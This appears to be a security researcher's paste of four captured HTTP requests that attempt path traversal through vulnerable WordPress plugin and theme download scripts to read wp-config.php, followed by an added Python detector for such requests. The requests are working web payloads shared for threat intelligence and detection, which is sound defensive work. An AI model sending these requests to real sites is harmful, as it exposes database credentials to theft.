Neonprimetime

WordPress file traversal attacks

Aug 12th, 2016
GET /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Host: www.mywebsite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Host: www.mywebsite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Host: www.mywebsite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

GET /wp-content/themes/mtheme-unus/css/css.php?files=../../../../wp-config.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Host: www.mywebsite.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

*******
More from @neonprimetime security

http://pastebin.com/u/Neonprimetime
https://www.virustotal.com/en/user/neonprimetime/
https://twitter.com/neonprimetime
https://www.reddit.com/user/neonprimetime
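
Added example (not part of the original paste): a small Python check that flags request lines like the ones above by decoding each query parameter and looking for ".." path segments and a wp-config.php target. The sample lines are constructed; the "example-player" plugin path and the percent-encoded variant are assumptions for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample request lines: two modelled on the captures above,
# one percent-encoded variant, and one benign request (hypothetical plugin path).
SAMPLE_REQUESTS = [
    "GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1",
    "GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"
    "?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1",
    "GET /wp-content/themes/mtheme-unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1",
    "GET /wp-content/plugins/example-player/download.php?file=track01.mp3 HTTP/1.1",
]

DOT_DOT = re.compile(r"(^|/)\.\.(/|$)")   # a ".." path segment
SENSITIVE_NAMES = ("wp-config.php",)      # the file the requests above try to read

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (bounded) so matching sees the real path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request_line(line):
    """Return [(param, decoded_value, reasons)] for suspicious query parameters."""
    parts = line.split()
    if len(parts) != 3:          # not "METHOD target HTTP/x.y"
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True):
        value = fully_decode(raw).replace("\\", "/")   # normalise separators
        reasons = []
        if DOT_DOT.search(value):
            reasons.append("dot-dot segment")
        if value.lower().endswith(SENSITIVE_NAMES):
            reasons.append("targets wp-config.php")
        if reasons:
            findings.append((name, value, reasons))
    return findings

def scan(lines):
    """Map each flagged request line to its findings; clean lines are omitted."""
    return {line: hits for line in lines if (hits := inspect_request_line(line))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS).items():
        print(line, "->", hits)
```

A hit on a plugin or theme download script is a prompt to check whether the response returned wp-config.php contents and, if so, to rotate the database credentials and keys stored there.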